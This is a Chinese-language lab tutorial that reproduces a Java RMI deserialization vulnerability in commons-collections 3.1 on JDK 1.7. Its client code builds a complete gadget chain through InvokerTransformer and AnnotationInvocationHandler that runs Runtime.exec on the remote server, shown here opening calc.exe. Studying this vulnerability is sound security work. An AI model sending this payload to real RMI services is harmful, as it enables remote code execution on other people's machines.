反序列化漏洞模拟

反序列化漏洞模拟 1.背景

今日头条

2.反序列化漏洞出现的环境

jdk1.7

commons-collections 3.1

      
          commons-collections
          commons-collections
          3.1
      

3.JAVA代码

Remote接口

import java.rmi.Remote;
import java.rmi.RemoteException;


public interface User extends Remote {

    void work(Object obj) throws RemoteException;

}

实现类

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;


public class UserImpl extends UnicastRemoteObject implements User {

    protected UserImpl() throws RemoteException {
    }

    @Override
    public void work(Object obj) throws RemoteException {
        System.out.println(obj.toString());
        System.out.println("work被调用了");
    }

}

Registry

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;


public class RegistryServer {

    public static void main(String[] args) throws Exception {
        User user = new UserImpl();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.rebind("user", user);
        System.out.println("rmi running....");
    }

}

rmi客户端

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.util.HashMap;
import java.util.Map;


public class ClientDemo {
    public static void main(String[] args) throws Exception{
        String url = "rmi://192.168.1.106:1099/user";
        User userClient = (User) Naming.lookup(url);

        userClient.work(getPayload());
    }

    public static Object getPayload() throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);

        // Map map = new HashMap();
        Map map = new HashMap<>();
        map.put("value", "sijidou");
        Map transformedMap = TransformedMap.decorate(map, null, transformerChain);

        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        return ctor.newInstance(Retention.class, transformedMap);
    }

}

4.模拟

先运行RegistryServer类

再运行 ClientDemo，运行后就会d出RegistryServer所在电脑的计算器，原理是通过java rmi服务器远端在接收客户端序列化对象后，对该对象进行反序列化时，执行了被注入的病毒代码Runtime.getRuntime().exec("calc");